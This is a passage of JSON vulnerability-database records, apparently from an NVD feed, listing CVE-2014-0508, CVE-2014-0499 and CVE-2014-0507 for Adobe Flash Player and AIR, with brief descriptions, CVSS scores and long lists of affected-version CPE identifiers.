"cpe:/a:adobe:adobe_air:3.1.0.4880", "cpe:/a:adobe:adobe_air:2.6", "cpe:/a:adobe:adobe_air:1.1", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1030", "cpe:/a:adobe:flash_player:11.1.102.63", "cpe:/a:adobe:adobe_air_sdk:3.8.0.910", "cpe:/a:adobe:flash_player:11.7.700.260", "cpe:/a:adobe:flash_player:11.2.202.236", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1210", "cpe:/a:adobe:flash_player:11.0.1.153", "cpe:/a:adobe:flash_player:11.3.300.273", "cpe:/a:adobe:flash_player:11.3.300.262", "cpe:/a:adobe:adobe_air:1.5.1.8210", "cpe:/a:adobe:adobe_air:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.55", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3690", 
"cpe:/a:adobe:adobe_air:2.0.4", "cpe:/a:adobe:flash_player:11.2.202.332", "cpe:/a:adobe:adobe_air_sdk:3.6.0.599", "cpe:/a:adobe:adobe_air:3.2.0.2070", "cpe:/a:adobe:adobe_air:3.1.0.485", "cpe:/a:adobe:adobe_air:2.6.0.19140", "cpe:/a:adobe:adobe_air:3.2.0.207", "cpe:/a:adobe:flash_player:11.2.202.285", "cpe:/a:adobe:flash_player:11.7.700.224", "cpe:/a:adobe:adobe_air:2.0.2", "cpe:/a:adobe:adobe_air:2.0.3.13070", "cpe:/a:adobe:flash_player:11.2.202.243", "cpe:/a:adobe:flash_player:11.5.502.149", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1380", "cpe:/a:adobe:flash_player:11.2.202.223", "cpe:/a:adobe:flash_player:11.2.202.336", "cpe:/a:adobe:adobe_air_sdk:3.6.0.6090", "cpe:/a:adobe:flash_player:11.5.502.146", "cpe:/a:adobe:adobe_air_sdk:3.5.0.880", "cpe:/a:adobe:flash_player:11.6.602.168", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1530", "cpe:/a:adobe:adobe_air:2.7.0.1953", "cpe:/a:adobe:adobe_air:3.9.0.1060", "cpe:/a:adobe:adobe_air:3.9.0.1380", "cpe:/a:adobe:adobe_air:2.7.1.19610", "cpe:/a:adobe:adobe_air:3.7.0.2090", "cpe:/a:adobe:flash_player:11.2.202.258", "cpe:/a:adobe:flash_player:11.6.602.180", "cpe:/a:adobe:adobe_air:2.5.0.16600", "cpe:/a:adobe:adobe_air:1.5.3.9120", "cpe:/a:adobe:adobe_air:3.6.0.6090", "cpe:/a:adobe:flash_player:12.0.0.43", "cpe:/a:adobe:adobe_air:3.9.0.1210", "cpe:/a:adobe:adobe_air:2.0.2.12610", "cpe:/a:adobe:flash_player:11.1.115.34", "cpe:/a:adobe:adobe_air:3.9.0.1030", "cpe:/a:adobe:flash_player:11.2.202.270", "cpe:/a:adobe:adobe_air_sdk:3.1.0.488", "cpe:/a:adobe:flash_player:11.5.502.136", "cpe:/a:adobe:adobe_air_sdk:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.310", "cpe:/a:adobe:flash_player:11.1.111.50", "cpe:/a:adobe:flash_player:11.1.115.48", "cpe:/a:adobe:flash_player:11.1.102.59", "cpe:/a:adobe:adobe_air:1.0", "cpe:/a:adobe:adobe_air:3.0.0.408", "cpe:/a:adobe:adobe_air:2.7", "cpe:/a:adobe:flash_player:11.8.800.168", "cpe:/a:adobe:flash_player:11.9.900.170", "cpe:/a:adobe:adobe_air:1.0.8.4990", "cpe:/a:adobe:adobe_air:2.0.3", 
"cpe:/a:adobe:flash_player:11.3.300.265", "cpe:/a:adobe:adobe_air:3.6.0.597", "cpe:/a:adobe:flash_player:11.4.402.278", "cpe:/a:adobe:adobe_air:3.7.0.1860", "cpe:/a:adobe:adobe_air_sdk:3.7.0.2090", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2540", "cpe:/a:adobe:adobe_air_sdk:3.2.0.2070", "cpe:/a:adobe:adobe_air:1.5.1", "cpe:/a:adobe:adobe_air:1.5.3.9130", "cpe:/a:adobe:flash_player:11.0", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1390", "cpe:/a:adobe:adobe_air_sdk:3.5.0.890", "cpe:/a:adobe:flash_player:11.1.102.62", "cpe:/a:adobe:flash_player:11.3.300.268", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2710", "cpe:/a:adobe:adobe_air:1.5.2", "cpe:/a:adobe:flash_player:11.8.800.97", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3650", "cpe:/a:adobe:adobe_air:3.5.0.880", "cpe:/a:adobe:flash_player:11.2.202.262", "cpe:/a:adobe:adobe_air:3.4.0.2540", "cpe:/a:adobe:flash_player:11.1.111.54", "cpe:/a:adobe:adobe_air:1.0.4990", "cpe:/a:adobe:adobe_air:1.5.0.7220", "cpe:/a:adobe:flash_player:11.2.202.273", "cpe:/a:adobe:flash_player:11.3.300.271", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1860", "cpe:/a:adobe:adobe_air:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.275", "cpe:/a:adobe:flash_player:12.0.0.41", "cpe:/a:adobe:adobe_air:1.5.3", "cpe:/a:adobe:flash_player:11.2.202.327", "cpe:/a:adobe:adobe_air:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.5.0.600", "cpe:/a:adobe:adobe_air:1.5", "cpe:/a:adobe:flash_player:11.7.700.257", "cpe:/a:adobe:flash_player:11.3.300.257", "cpe:/a:adobe:flash_player:11.7.700.252", "cpe:/a:adobe:flash_player:11.2.202.251", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1628", "cpe:/a:adobe:flash_player:11.9.900.152", "cpe:/a:adobe:flash_player:11.9.900.117", "cpe:/a:adobe:adobe_air:1.0.1", "cpe:/a:adobe:flash_player:11.1", "cpe:/a:adobe:flash_player:11.2.202.280", "cpe:/a:adobe:flash_player:11.2.202.235", "cpe:/a:adobe:flash_player:11.5.502.135", "cpe:/a:adobe:adobe_air:1.1.0.5790", "cpe:/a:adobe:flash_player:11.2.202.341", "cpe:/a:adobe:adobe_air:2.7.0.1948", "cpe:/a:adobe:flash_player:11.2.202.297", 
"cpe:/a:adobe:flash_player:11.7.700.169", "cpe:/a:adobe:flash_player:11.2.202.233", "cpe:/a:adobe:adobe_air:2.5.1.17730", "cpe:/a:adobe:adobe_air:3.7.0.1530", "cpe:/a:adobe:flash_player:11.4.402.265", "cpe:/a:adobe:flash_player:11.6.602.171"], "id": "CVE-2014-0508", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0508", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:11.2.202.243:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.268:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.232:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.341:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.48:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.149:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.1430:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.291:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.55:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.0.16600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.870:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:adobe_air:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.260:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.346:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.153:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1.19610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3690:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.332:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19480:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.280:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.242:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.180:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.327:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.335:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1.8210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.135:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.110:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.54:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:adobe_air:1.0.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.50:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.117:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.136:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.236:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1953:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.597:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.58:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.285:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.252:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.224:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.258:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1628:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9130:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.171:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.238:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.336:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.251:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.310:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.3.0.3670:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.94:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:adobe_air:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.278:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.62:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1948:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.275:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1.0.5790:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3.13070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.1.17730:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.4880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.8.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.59:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2.12610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.271:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.0.7220:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.170:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.297:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.202:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3650:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.44:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.146:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19140:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.485:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.261:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.223:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.599:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.408:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-20T13:51:01", "description": "Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 do not prevent access to address information, which makes it easier for attackers to bypass the ASLR protection mechanism via unspecified vectors.", "cvss3": {}, "published": "2014-02-21T05:07:00", "type": "cve", "title": "CVE-2014-0499", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0499"], "modified": "2018-12-13T15:54:00", "cpe": [], "id": "CVE-2014-0499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0499", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-09-20T14:04:20", "description": "Buffer overflow in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows attackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T23:55:00", "type": "cve", "title": "CVE-2014-0507", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0507"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/a:adobe:adobe_air:2.7.0.19480", "cpe:/a:adobe:adobe_air_sdk:3.8.0.870", "cpe:/a:adobe:flash_player:11.5.502.110", "cpe:/a:adobe:flash_player:12.0.0.38", 
"cpe:/a:adobe:adobe_air:3.8.0.910", "cpe:/a:adobe:adobe_air:3.3.0.3670", "cpe:/a:adobe:flash_player:11.1.115.54", "cpe:/a:adobe:adobe_air:3.4.0.2710", "cpe:/a:adobe:flash_player:11.6.602.167", "cpe:/a:adobe:flash_player:11.2.202.228", "cpe:/a:adobe:adobe_air:3.8.0.870", "cpe:/a:adobe:flash_player:11.2.202.291", "cpe:/a:adobe:flash_player:11.4.402.287", "cpe:/a:adobe:flash_player:11.3.300.270", "cpe:/a:adobe:flash_player:11.2.202.346", "cpe:/a:adobe:flash_player:11.0.1.152", "cpe:/a:adobe:adobe_air:3.5.0.1060", "cpe:/a:adobe:adobe_air:2.7.1", "cpe:/a:adobe:adobe_air:2.6.0.19120", "cpe:/a:adobe:flash_player:11.1.111.8", "cpe:/a:adobe:flash_player:11.2.202.238", "cpe:/a:adobe:flash_player:11.7.700.202", "cpe:/a:adobe:flash_player:11.8.800.94", "cpe:/a:adobe:adobe_air:3.5.0.890", "cpe:/a:adobe:flash_player:11.7.700.232", "cpe:/a:adobe:adobe_air_sdk:3.8.0.1430", "cpe:/a:adobe:flash_player:11.1.111.44", "cpe:/a:adobe:flash_player:11.2.202.335", "cpe:/a:adobe:flash_player:11.1.115.7", "cpe:/a:adobe:adobe_air:2.7.0.19530", "cpe:/a:adobe:adobe_air_sdk:3.5.0.1060", "cpe:/a:adobe:flash_player:11.2.202.261", "cpe:/a:adobe:adobe_air:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.242", "cpe:/a:adobe:flash_player:11.1.115.58", "cpe:/a:adobe:adobe_air:3.1.0.4880", "cpe:/a:adobe:adobe_air:2.6", "cpe:/a:adobe:adobe_air:1.1", "cpe:/a:adobe:flash_player:11.7.700.260", "cpe:/a:adobe:flash_player:11.1.102.63", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1030", "cpe:/a:adobe:adobe_air_sdk:3.8.0.910", "cpe:/a:adobe:flash_player:11.2.202.236", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1210", "cpe:/a:adobe:flash_player:11.0.1.153", "cpe:/a:adobe:flash_player:11.3.300.273", "cpe:/a:adobe:flash_player:11.3.300.262", "cpe:/a:adobe:adobe_air:1.5.1.8210", "cpe:/a:adobe:adobe_air:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.55", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3690", "cpe:/a:adobe:adobe_air:2.0.4", "cpe:/a:adobe:flash_player:11.2.202.332", "cpe:/a:adobe:adobe_air_sdk:3.6.0.599", 
"cpe:/a:adobe:adobe_air:3.2.0.2070", "cpe:/a:adobe:flash_player:11.7.700.224", "cpe:/a:adobe:adobe_air:3.1.0.485", "cpe:/a:adobe:adobe_air:2.6.0.19140", "cpe:/a:adobe:flash_player:11.2.202.285", "cpe:/a:adobe:adobe_air:3.2.0.207", "cpe:/a:adobe:adobe_air:2.0.2", "cpe:/a:adobe:adobe_air:2.0.3.13070", "cpe:/a:adobe:flash_player:11.2.202.243", "cpe:/a:adobe:flash_player:11.5.502.149", "cpe:/a:adobe:flash_player:11.2.202.223", "cpe:/a:adobe:flash_player:11.2.202.336", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1380", "cpe:/a:adobe:adobe_air_sdk:3.6.0.6090", "cpe:/a:adobe:flash_player:11.5.502.146", "cpe:/a:adobe:flash_player:11.6.602.168", "cpe:/a:adobe:adobe_air_sdk:3.5.0.880", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1530", "cpe:/a:adobe:adobe_air:2.7.0.1953", "cpe:/a:adobe:adobe_air:3.9.0.1060", "cpe:/a:adobe:adobe_air:3.9.0.1380", "cpe:/a:adobe:adobe_air:2.7.1.19610", "cpe:/a:adobe:flash_player:11.6.602.180", "cpe:/a:adobe:flash_player:11.2.202.258", "cpe:/a:adobe:adobe_air:3.7.0.2090", "cpe:/a:adobe:adobe_air:2.5.0.16600", "cpe:/a:adobe:adobe_air:1.5.3.9120", "cpe:/a:adobe:flash_player:12.0.0.43", "cpe:/a:adobe:adobe_air:3.6.0.6090", "cpe:/a:adobe:flash_player:11.1.115.34", "cpe:/a:adobe:adobe_air:3.9.0.1210", "cpe:/a:adobe:adobe_air:2.0.2.12610", "cpe:/a:adobe:adobe_air:3.9.0.1030", "cpe:/a:adobe:flash_player:11.2.202.270", "cpe:/a:adobe:flash_player:11.5.502.136", "cpe:/a:adobe:adobe_air_sdk:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.310", "cpe:/a:adobe:flash_player:11.1.111.50", "cpe:/a:adobe:flash_player:11.1.115.48", "cpe:/a:adobe:flash_player:11.1.102.59", "cpe:/a:adobe:flash_player:11.9.900.170", "cpe:/a:adobe:adobe_air:1.0", "cpe:/a:adobe:adobe_air:2.7", "cpe:/a:adobe:flash_player:11.8.800.168", "cpe:/a:adobe:adobe_air:3.0.0.408", "cpe:/a:adobe:adobe_air:1.0.8.4990", "cpe:/a:adobe:adobe_air:2.0.3", "cpe:/a:adobe:flash_player:11.3.300.265", "cpe:/a:adobe:adobe_air:3.6.0.597", "cpe:/a:adobe:flash_player:11.4.402.278", 
"cpe:/a:adobe:adobe_air:3.7.0.1860", "cpe:/a:adobe:adobe_air_sdk:3.7.0.2090", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2540", "cpe:/a:adobe:adobe_air_sdk:3.2.0.2070", "cpe:/a:adobe:adobe_air:1.5.1", "cpe:/a:adobe:adobe_air:1.5.3.9130", "cpe:/a:adobe:flash_player:11.0", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.62", "cpe:/a:adobe:flash_player:11.3.300.268", "cpe:/a:adobe:adobe_air_sdk:3.5.0.890", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2710", "cpe:/a:adobe:adobe_air:1.5.2", "cpe:/a:adobe:flash_player:11.8.800.97", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3650", "cpe:/a:adobe:adobe_air:3.5.0.880", "cpe:/a:adobe:flash_player:11.2.202.262", "cpe:/a:adobe:adobe_air:3.4.0.2540", "cpe:/a:adobe:flash_player:11.1.111.54", "cpe:/a:adobe:adobe_air:1.0.4990", "cpe:/a:adobe:adobe_air:1.5.0.7220", "cpe:/a:adobe:flash_player:11.2.202.273", "cpe:/a:adobe:flash_player:11.3.300.271", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1860", "cpe:/a:adobe:adobe_air:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.275", "cpe:/a:adobe:flash_player:12.0.0.41", "cpe:/a:adobe:adobe_air:1.5.3", 